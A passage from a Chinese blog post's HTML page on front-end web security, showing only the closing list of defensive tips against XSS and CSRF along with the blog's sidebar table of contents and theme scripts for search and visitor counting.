<ol>
<li>谨慎用户输入信息，进行输入检查（客户端和服务端同时检查）</li>
<li>在变量输出到 HTML 页面时，都应该进行编码或转义来预防 XSS 攻击</li>
<li>该用验证码的时候一定要添上</li>
<li>尽量在重要请求上添加 Token 参数，注意 Token 要足够随机，用足够安全的随机数生成算法</li>
</ol>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/javascript/" rel="tag"># javascript</a>
          
            <a href="/tags/前端/" rel="tag"># 前端</a>
          
            <a href="/tags/ECMAScript/" rel="tag"># ECMAScript</a>
          
        </div>
      

      
      
        <div class="post-widgets">
        

        

        
          
          <div id="needsharebutton-postbottom">
            <span class="btn">
              <i class="fa fa-share-alt" aria-hidden="true"></i>
            </span>
          </div>
        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/archives/mobile-web-capabiltiy-faq.html" rel="next" title="移动端常见兼容性问题及解决方案">
                <i class="fa fa-chevron-left"></i> 移动端常见兼容性问题及解决方案
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/archives/sort-algorithm-implement-in-browser.html" rel="prev" title="深入浅出浏览器 js 的数组排序算法">
                深入浅出浏览器 js 的数组排序算法 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/icons/icon-128x128.png" alt="BangZ">
            
              <p class="site-author-name" itemprop="name">BangZ</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">79</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">5</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">37</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/istobran" target="_blank" title="GitHub" rel="external nofollow noopener noreferrer"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:i@bangz.me" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#安全问题的分类"><span class="nav-text">安全问题的分类</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#按照所发生的区域分类"><span class="nav-text">按照所发生的区域分类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#按照团队中哪个角色最适合来修复安全问题分类"><span class="nav-text">按照团队中哪个角色最适合来修复安全问题分类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#综合以上"><span class="nav-text">综合以上</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#浏览器安全"><span class="nav-text">浏览器安全</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#同源策略"><span class="nav-text">同源策略</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#不受同源策略的标签"><span class="nav-text">不受同源策略的标签</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#三大前端安全问题"><span class="nav-text">三大前端安全问题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1、跨站脚本攻击（XSS）"><span class="nav-text">1、跨站脚本攻击（XSS）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#定义"><span class="nav-text">定义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#本质"><span class="nav-text">本质</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS-的分类"><span class="nav-text">XSS 的分类</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、反射型-XSS：将用户输入的数据反射给浏览器。黑客需要诱使用户-“点击”-一个恶意链接，才能攻击成功。"><span class="nav-text">1、反射型 XSS：将用户输入的数据反射给浏览器。黑客需要诱使用户 “点击” 一个恶意链接，才能攻击成功。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、存储型-XSS：把用户输入的数据-“存储”-在服务器端，这种-XSS-具有很强的稳定性。"><span class="nav-text">2、存储型 XSS：把用户输入的数据 “存储” 在服务器端，这种 XSS 具有很强的稳定性。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、DOM-Based-XSS：通过修改页面的-DOM-节点形成的-XSS。"><span class="nav-text">3、DOM Based XSS：通过修改页面的 DOM 节点形成的 XSS。</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS-Payload-攻击"><span class="nav-text">XSS Payload 攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#定义-1"><span class="nav-text">定义</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#实例"><span class="nav-text">实例</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS-的防御"><span class="nav-text">XSS 的防御</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、HttpOnly"><span class="nav-text">1、HttpOnly</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、输入检查（XSS-Filter）"><span class="nav-text">2、输入检查（XSS Filter）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、输出检查"><span class="nav-text">3、输出检查</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#防御-DOM-Based-XSS"><span class="nav-text">防御 DOM Based XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#总结"><span class="nav-text">总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、CSRF（跨站点请求伪造）"><span class="nav-text">2、CSRF（跨站点请求伪造）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#什么是-CSRF"><span class="nav-text">什么是 CSRF</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF-的原理"><span class="nav-text">CSRF 的原理</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#CSRF-本质"><span class="nav-text">CSRF 本质</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF-的防御"><span class="nav-text">CSRF 的防御</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#解决方案"><span class="nav-text">解决方案</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1、验证码"><span class="nav-text">1、验证码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2、Referer-Check"><span class="nav-text">2、Referer Check</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3、使用-Anti-CSRF-Token"><span class="nav-text">3、使用 Anti CSRF Token</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSRF-攻击"><span class="nav-text">XSRF 攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#结论"><span class="nav-text">结论</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、点击劫持（ClickJacking）"><span class="nav-text">3、点击劫持（ClickJacking）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#什么是点击劫持"><span class="nav-text">什么是点击劫持</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#防御点击劫持：X-Frame-Options"><span class="nav-text">防御点击劫持：X-Frame-Options</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#有三个可选的值"><span class="nav-text">有三个可选的值</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小结"><span class="nav-text">小结</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">BangZ</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io" rel="external nofollow noopener noreferrer">Hexo</a> 强力驱动 v3.7.1</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next" rel="external nofollow noopener noreferrer">NexT.Muse</a> v6.3.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("4MAiIplUcsxIjad83U2IW99g-gzGzoHsz", "nxvNFChEQkVNNMr7yClwBekv");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            
              var $element = $(document.getElementById(url));
              $element.find('.leancloud-visitors-count').text(counter.get('time'));
            
            counter.save(null, {
              success: function(counter) {
                
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            
              var newcounter = new Counter();
              /* Set ACL */
              var acl = new AV.ACL();
              acl.setPublicReadAccess(true);
              acl.setPublicWriteAccess(true);
              newcounter.setACL(acl);
              /* End Set ACL */
              newcounter.set("title", title);
              newcounter.set("url", url);
              newcounter.set("time", 1);
              newcounter.save(null, {
                success: function(newcounter) {
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
                },
                error: function(newcounter, error) {
                  console.log('Failed to create');
                }
              });
            
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  
  
  
  <script src="/lib/needsharebutton/needsharebutton.js"></script>

  <script>
    
      pbOptions = {};
      
          pbOptions.iconStyle = "box";
      
          pbOptions.boxForm = "horizontal";
      
          pbOptions.position = "bottomCenter";
      
          pbOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
      
      new needShareButton('#needsharebutton-postbottom', pbOptions);
    
    
  </script>

  

  

  

  

  

  

<script>if ('serviceWorker' in navigator) {
  navigator.serviceWorker.register('/sw.js?t=1538382677193')
    .then(function () {console.log('ServiceWorker Register Successfully.')})
    .catch(function (e) {console.error(e)});
}
</script></body>
</html>
